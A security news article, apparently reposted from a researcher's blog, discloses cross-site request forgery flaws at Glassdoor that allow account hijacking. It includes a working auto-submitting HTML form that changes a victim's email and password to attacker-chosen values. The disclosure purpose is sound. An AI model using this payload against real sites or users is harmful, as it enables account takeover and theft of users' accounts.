Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|
Advertisement

Ad Placeholder

Full Width × 90

Hacking

Several critical security vulnerabilities affect the Glassdoor website

The security expert  Mohamed M.Fouad discovered several critical security vulnerabilities at Glassdoor, which can lead to very harmful impact on all users. The Independent Security Researcher Mohamed M.Fouad has discovered  a lot of critical security vulnerabilities at Glassdoor that could lead to very harmful impact on all users.  Mohamed M.Fouad an Independent Security Researcher from Egypt. I […]

Several critical security vulnerabilities affect the Glassdoor website

The security expert  Mohamed M.Fouad discovered several critical security vulnerabilities at Glassdoor, which can lead to very harmful impact on all users.

The Independent Security Researcher Mohamed M.Fouad has discovered  a lot of critical security vulnerabilities at Glassdoor that could lead to very harmful impact on all users.  Mohamed M.Fouad an Independent Security Researcher from Egypt. I have been got acknowledgement from many of the Firms like as Microsoft,Oracle,Yahoo,eBay,Sony,AT&T,Huawui,Adobe,DropCam, Bitcasa, Get Pocket, Splitwise and so many…

Glassdoor is an American site, launched in 2007,  where employees and former employees anonymously review companies and their management, the company proposes its activity as a precous helps for the users to find a job and company they love. In the year prior to April 2014, more than 500,000 company reviews were submitted to the website.

Glassdoor 2

================================================

CAUTION
 
THIS IS FOR LEARNING PURPOSE AND FOR ETHICAL USE ONLY…
 
 
HELLO GUYS!
Today i will show you how I discovered a lot of critical security vulnerabilities at Glassdoor, which can lead to very harmful impact on all users by force users change their passwords , change emails or change anything in their profile settings like job alerts… but these vulnerabilities can be escalated to deface all the site by posting malicious urls in Jobs reviews and all users password will be changed.
Before i begin i would like to warn Glassdoor to fix this security vulnerability because it can harm their website and all users like what happend in Jobvite after the publication of my article in TheHackerNews. Jobvite changed their website due to dangerous security vulnerabilities SQLi and LFI . I reported CSRF Account hijacking vulnerability to other jobs websites and they fixed it immediately because this is kinf of flaw considered critical by the experts and that could be exploited with serious conseguences to the end-user. I need to announce all users that i focused my analysis on jobs websites during the past six months discovering that it’s many of them are affected by this vulnerability and by other critical flaws like SQLi , XSS (Cross Site Scripting), Broken Authentication and Indirect Object Reference .I always reported the vulnerability to the company that inserted my activity in their bounty programs and in some cases they hired me as a Freelancer security consultant.

Story :

One Month and half ago I have found a Critical Vulnerability in Glassdoor, it was an account hijacking via CSRF vulnerability and attacker can exploit it to deface all the website, adding a new job with malicious url to change users passwords after visit the job or to serve a link to malicious websites hosting dangerous exploit kits. I tried to contact them via emails and social network media, but Glassdoor didn’t reply me.
The Impact is serious, a threat actor can change any details in user account settings, the most critical issue is the possibility to change user password and e-mail simply with a one-click malicious URL.
Below is the Critical one !!!!
 

Email Address and Password CSRF :
=============================================
<html>
<body onload=”document.csrf.submit()”>
<formaction=”https://www.glassdoor.com/member/account/settings_execute.htm” method=”post” name=”csrf”>
<input type=”hidden” name=”selTabIndex=1″ value=”1″><br>
<inputtype=”hidden”name=”emailAddress” value=”attacker@hotmail.com”><br>
<input type=”hidden” name=”birthYear” value=””><br>
<input type=”hidden” name=”race” value=””><br>
<input type=”hidden” name=”highestEducation” value=””><br>
<input type=”hidden” name=”newPassword” value=”hacked@2014″><br>
<input type=”hidden” name=”confirmPassword” value=”hacked@2014″><br>
</form>
</form>
</body>

 
Below a video POC of the attack.

Article written by Mohamed M.Fouad and posted on his Blog.

Pierluigi Paganini

(Security Affairs –  Glassdoor, Hacking)